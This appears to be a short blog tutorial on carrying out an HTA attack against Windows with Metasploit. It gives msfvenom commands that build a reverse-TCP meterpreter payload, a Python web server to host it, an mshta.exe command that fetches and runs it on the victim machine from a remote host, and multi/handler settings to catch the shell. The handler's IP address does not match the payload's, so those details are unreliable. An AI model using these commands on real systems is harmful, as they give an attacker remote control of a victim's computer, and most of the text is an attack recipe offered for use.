HTA Attack Using Metasploit
"HTML Application (HTA)" Is An HTML Microsoft Windows Program Capable Of Running Scripting Languages, Such As VBScript Or JScript.
The Metasploit HTA Web Server Exploit Module Hosts An HTA That When Opened Runs A Payload Via Power Shell.
Perform HTA Attack
Step 1: To Create Payload For Windows. Open Terminal And Type. To "Start Python Server" Write Below Command.
msfvenom -p windows/meterpreter/reverse_tcp lHOST=192.168.0.103 lport=1234 -f hta-psh > shell.hta
Note: 192.168.0.103 Is My System ip Address And 1234 Is The Port Number That I Want To Use.
python -m SimpleHTTPServer 80
Step 2: Run The Above File By Typing:
mshta.exe http://192.168.0.103/shell.hta
Step 3: Simultaneously, Start Your Handler To Receive A Session When You Run The Above File In The Victim’s cmd Prompt. To Start The Multi/Handler Type:
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit



Comments
Post a Comment